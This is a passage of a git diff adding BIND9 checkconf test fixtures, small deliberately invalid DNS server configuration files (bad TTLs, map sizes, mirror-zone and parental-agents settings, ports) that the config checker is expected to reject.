/dev/null +++ b/bin/tests/system/checkconf/bad-lmdb-mapsize-bogus.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + lmdb-mapsize bogusvalue; +}; diff --git a/bin/tests/system/checkconf/bad-lmdb-mapsize-toolarge.conf b/bin/tests/system/checkconf/bad-lmdb-mapsize-toolarge.conf new file mode 100644 index 0000000..006ca7d --- /dev/null +++ b/bin/tests/system/checkconf/bad-lmdb-mapsize-toolarge.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + lmdb-mapsize 2048G; +}; diff --git a/bin/tests/system/checkconf/bad-lmdb-mapsize-toosmall.conf b/bin/tests/system/checkconf/bad-lmdb-mapsize-toosmall.conf new file mode 100644 index 0000000..5dd1720 --- /dev/null +++ b/bin/tests/system/checkconf/bad-lmdb-mapsize-toosmall.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + lmdb-mapsize 1; +}; diff --git a/bin/tests/system/checkconf/bad-lmdb-mapsize-unlimited.conf b/bin/tests/system/checkconf/bad-lmdb-mapsize-unlimited.conf new file mode 100644 index 0000000..f1e7b88 --- /dev/null +++ b/bin/tests/system/checkconf/bad-lmdb-mapsize-unlimited.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + lmdb-mapsize unlimited; +}; diff --git a/bin/tests/system/checkconf/bad-master-request-ixfr.conf b/bin/tests/system/checkconf/bad-master-request-ixfr.conf new file mode 100644 index 0000000..19384b3 --- /dev/null +++ b/bin/tests/system/checkconf/bad-master-request-ixfr.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * request-ixfr clause is not allowed in zone of type master. + */ + +zone dummy { + type master; + request-ixfr no; + file "xxxx"; +}; diff --git a/bin/tests/system/checkconf/bad-masters-dup.conf b/bin/tests/system/checkconf/bad-masters-dup.conf new file mode 100644 index 0000000..ed761c9 --- /dev/null +++ b/bin/tests/system/checkconf/bad-masters-dup.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.net" { + type secondary; + primaries { 192.168.1.1; }; + masters { 192.168.1.2; }; +}; diff --git a/bin/tests/system/checkconf/bad-maxcachettl.conf b/bin/tests/system/checkconf/bad-maxcachettl.conf new file mode 100644 index 0000000..47f0643 --- /dev/null +++ b/bin/tests/system/checkconf/bad-maxcachettl.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + max-cache-ttl 1x; +}; diff --git a/bin/tests/system/checkconf/bad-maxncachettl-1.conf b/bin/tests/system/checkconf/bad-maxncachettl-1.conf new file mode 100644 index 0000000..ad852c3 --- /dev/null +++ b/bin/tests/system/checkconf/bad-maxncachettl-1.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + max-ncache-ttl 1x; +}; diff --git a/bin/tests/system/checkconf/bad-maxncachettl-2.conf b/bin/tests/system/checkconf/bad-maxncachettl-2.conf new file mode 100644 index 0000000..ada5c83 --- /dev/null +++ b/bin/tests/system/checkconf/bad-maxncachettl-2.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view two { + max-ncache-ttl 604801; +}; diff --git a/bin/tests/system/checkconf/bad-maxncachettl-3.conf b/bin/tests/system/checkconf/bad-maxncachettl-3.conf new file mode 100644 index 0000000..771a0f3 --- /dev/null +++ b/bin/tests/system/checkconf/bad-maxncachettl-3.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view three { + max-ncache-ttl 4000000000; +}; +view four { + max-ncache-ttl -1; +}; diff --git a/bin/tests/system/checkconf/bad-maxncachettl-4.conf b/bin/tests/system/checkconf/bad-maxncachettl-4.conf new file mode 100644 index 0000000..d9cd939 --- /dev/null +++ b/bin/tests/system/checkconf/bad-maxncachettl-4.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view four { + max-ncache-ttl -1; +}; diff --git a/bin/tests/system/checkconf/bad-maxratio1.conf b/bin/tests/system/checkconf/bad-maxratio1.conf new file mode 100644 index 0000000..b6f6420 --- /dev/null +++ b/bin/tests/system/checkconf/bad-maxratio1.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone example { + type master; + masterfile-format map; + file "example.db"; + max-ixfr-ratio 0.9; +}; diff --git a/bin/tests/system/checkconf/bad-maxratio2.conf b/bin/tests/system/checkconf/bad-maxratio2.conf new file mode 100644 index 0000000..54fec84 --- /dev/null +++ b/bin/tests/system/checkconf/bad-maxratio2.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone example { + type master; + masterfile-format map; + file "example.db"; + max-ixfr-ratio 0%; +}; diff --git a/bin/tests/system/checkconf/bad-maxttlmap.conf b/bin/tests/system/checkconf/bad-maxttlmap.conf new file mode 100644 index 0000000..b2d8043 --- /dev/null +++ b/bin/tests/system/checkconf/bad-maxttlmap.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone example { + type master; + masterfile-format map; + file "example.db"; + max-zone-ttl 3600; +}; diff --git a/bin/tests/system/checkconf/bad-mincachettl.conf b/bin/tests/system/checkconf/bad-mincachettl.conf new file mode 100644 index 0000000..cd02c66 --- /dev/null +++ b/bin/tests/system/checkconf/bad-mincachettl.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + min-cache-ttl 1x; +}; diff --git a/bin/tests/system/checkconf/bad-minncachettl.conf b/bin/tests/system/checkconf/bad-minncachettl.conf new file mode 100644 index 0000000..1148bcc --- /dev/null +++ b/bin/tests/system/checkconf/bad-minncachettl.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view one { + min-ncache-ttl 1x; +}; diff --git a/bin/tests/system/checkconf/bad-mirror-allow-recursion-none.conf b/bin/tests/system/checkconf/bad-mirror-allow-recursion-none.conf new file mode 100644 index 0000000..351b3dd --- /dev/null +++ b/bin/tests/system/checkconf/bad-mirror-allow-recursion-none.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + recursion yes; + allow-recursion { none; }; +}; + +zone "." { + type mirror; + masters { 127.0.0.1; }; +}; diff --git a/bin/tests/system/checkconf/bad-mirror-explicit-notify-yes.conf b/bin/tests/system/checkconf/bad-mirror-explicit-notify-yes.conf new file mode 100644 index 0000000..27ad850 --- /dev/null +++ b/bin/tests/system/checkconf/bad-mirror-explicit-notify-yes.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type mirror; + notify yes; +}; diff --git a/bin/tests/system/checkconf/bad-mirror-non-root-zone-without-masters.conf b/bin/tests/system/checkconf/bad-mirror-non-root-zone-without-masters.conf new file mode 100644 index 0000000..c9c8b03 --- /dev/null +++ b/bin/tests/system/checkconf/bad-mirror-non-root-zone-without-masters.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "foo." { + type mirror; +}; diff --git a/bin/tests/system/checkconf/bad-mirror-recursion-no.conf b/bin/tests/system/checkconf/bad-mirror-recursion-no.conf new file mode 100644 index 0000000..f5536ac --- /dev/null +++ b/bin/tests/system/checkconf/bad-mirror-recursion-no.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + recursion no; +}; + +zone "." { + type mirror; +}; diff --git a/bin/tests/system/checkconf/bad-mirror-zonename.conf b/bin/tests/system/checkconf/bad-mirror-zonename.conf new file mode 100644 index 0000000..6fc11c1 --- /dev/null +++ b/bin/tests/system/checkconf/bad-mirror-zonename.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "\0example" { + type mirror; + file "example.db"; +}; diff --git a/bin/tests/system/checkconf/bad-noddns.conf b/bin/tests/system/checkconf/bad-noddns.conf new file mode 100644 index 0000000..0e45c5c --- /dev/null +++ b/bin/tests/system/checkconf/bad-noddns.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone example { + type master; + file "example.db"; + auto-dnssec maintain; + allow-update { none; }; +}; diff --git a/bin/tests/system/checkconf/bad-notify-source-v6.conf b/bin/tests/system/checkconf/bad-notify-source-v6.conf new file mode 100644 index 0000000..ef53c96 --- /dev/null +++ b/bin/tests/system/checkconf/bad-notify-source-v6.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + notify-source-v6 fd92:7065:b8e:ffff::1 port 5300; +}; diff --git a/bin/tests/system/checkconf/bad-notify-source.conf b/bin/tests/system/checkconf/bad-notify-source.conf new file mode 100644 index 0000000..b950784 --- /dev/null +++ b/bin/tests/system/checkconf/bad-notify-source.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + notify-source 10.53.0.1 port 5300; +}; diff --git a/bin/tests/system/checkconf/bad-options-also-notify.conf b/bin/tests/system/checkconf/bad-options-also-notify.conf new file mode 100644 index 0000000..74714f7 --- /dev/null +++ b/bin/tests/system/checkconf/bad-options-also-notify.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + also-notify { missing; }; +}; + +zone "example.net" { + type slave; + masters { 192.168.1.1; }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-def-options.conf b/bin/tests/system/checkconf/bad-parental-agents-def-options.conf new file mode 100644 index 0000000..2091155 --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-def-options.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + parental-agents { 192.168.1.2; }; +}; + +zone "example.net" { + type primary; + file "example.net.db"; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-def-view.conf b/bin/tests/system/checkconf/bad-parental-agents-def-view.conf new file mode 100644 index 0000000..47c062a --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-def-view.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "test" { + parental-agents { 192.168.1.2; }; + zone "example.net" { + type primary; + file "example.net.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-def-view2.conf b/bin/tests/system/checkconf/bad-parental-agents-def-view2.conf new file mode 100644 index 0000000..aa65a4d --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-def-view2.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "test" { + parental-agents "net" { + 192.168.1.2; + }; + zone "example.net" { + type primary; + file "example.net.db"; + }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-def-zone.conf b/bin/tests/system/checkconf/bad-parental-agents-def-zone.conf new file mode 100644 index 0000000..e2a8389 --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-def-zone.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.net" { + type primary; + file "example.net.db"; + parental-agents "net" { 192.168.1.1; }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-dup.conf b/bin/tests/system/checkconf/bad-parental-agents-dup.conf new file mode 100644 index 0000000..cb5ac44 --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-dup.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.net" { + type primary; + file "example.net.db"; + parental-agents { 192.168.1.1; }; + parental-agents { 192.168.1.1; }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-dupdef.conf b/bin/tests/system/checkconf/bad-parental-agents-dupdef.conf new file mode 100644 index 0000000..7ca88f7 --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-dupdef.conf @@ -0,0 +1,26 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +parental-agents "net" { + 192.168.1.1; +}; + +parental-agents "net" { + 192.168.1.2; +}; + +zone "example.net" { + type primary; + file "example.net.db"; + parental-agents { "net"; }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-empty.conf b/bin/tests/system/checkconf/bad-parental-agents-empty.conf new file mode 100644 index 0000000..f61de06 --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-empty.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +parental-agents "net" { }; + +zone "example.net" { + type primary; + file "example.net.db"; + parental-agents { "net"; }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-empty2.conf b/bin/tests/system/checkconf/bad-parental-agents-empty2.conf new file mode 100644 index 0000000..93b8f7b --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-empty2.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.net" { + type primary; + file "example.net.db"; + parental-agents { }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-mirror.conf b/bin/tests/system/checkconf/bad-parental-agents-mirror.conf new file mode 100644 index 0000000..62926e2 --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-mirror.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "." { + type mirror; + file "root.mirror"; + parental-agents { 192.168.1.1; }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-agents-notfound.conf b/bin/tests/system/checkconf/bad-parental-agents-notfound.conf new file mode 100644 index 0000000..98075c4 --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-agents-notfound.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +parental-agents "com" { + 192.168.1.2; +}; + +zone "example.net" { + type primary; + file "example.net.db"; + parental-agents { "net"; }; +}; diff --git a/bin/tests/system/checkconf/bad-parental-source-v6.conf b/bin/tests/system/checkconf/bad-parental-source-v6.conf new file mode 100644 index 0000000..1b053d0 --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-source-v6.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + parental-source-v6 fd92:7065:b8e:ffff::1 port 5300; +}; diff --git a/bin/tests/system/checkconf/bad-parental-source.conf b/bin/tests/system/checkconf/bad-parental-source.conf new file mode 100644 index 0000000..9587b3e --- /dev/null +++ b/bin/tests/system/checkconf/bad-parental-source.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 5300; +}; + +zone example { + type secondary; + primaries { 1.2.3.4; }; + parental-source 10.53.0.1 port 5300; +}; diff --git a/bin/tests/system/checkconf/bad-port.conf b/bin/tests/system/checkconf/bad-port.conf new file mode 100644 index 0000000..9650c8f --- /dev/null +++ b/bin/tests/system/checkconf/bad-port.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port 99999; +}; diff --git a/bin/tests/system/checkconf/bad-primaries-key.conf b/bin/tests/system/checkconf/bad-primaries-key.conf new file mode 100644 index 0000000..f592293 --- /dev/null +++ b/bin/tests/system/checkconf/bad-primaries-key.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone example { + type secondary; + primaries { 1.2.3.4 key a..b; }; +}; diff --git a/bin/tests/system/checkconf/bad-primaries-notfound.conf b/bin/tests/system/checkconf/bad-primaries-notfound.conf new file mode 100644 index 0000000..4640098 --- /dev/null +++ b/bin/tests/system/checkconf/bad-primaries-notfound.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +primaries "net" { + 192.168.1.2; +}; + +zone "example.net" { + type secondary; + primaries { "foo"; }; +}; diff --git a/bin/tests/system/checkconf/bad-printtime.conf b/bin/tests/system/checkconf/bad-printtime.conf new file mode 100644 index 0000000..80a53cb --- /dev/null +++ b/bin/tests/system/checkconf/bad-printtime.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +logging { + channel one { + file "one.out"; + print-time bogus; + }; +}; diff --git a/bin/tests/system/checkconf/bad-rate-limit-acl.conf b/bin/tests/system/checkconf/bad-rate-limit-acl.conf new file mode 100644 index 0000000..06543fb --- /dev/null +++ b/bin/tests/system/checkconf/bad-rate-limit-acl.conf @@ -0,0 +1,20 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + rate-limit { + responses-per-second 10; + exempt-clients { localhost; localnets; unknownacl; }; + log-only yes; + }; +}; diff --git 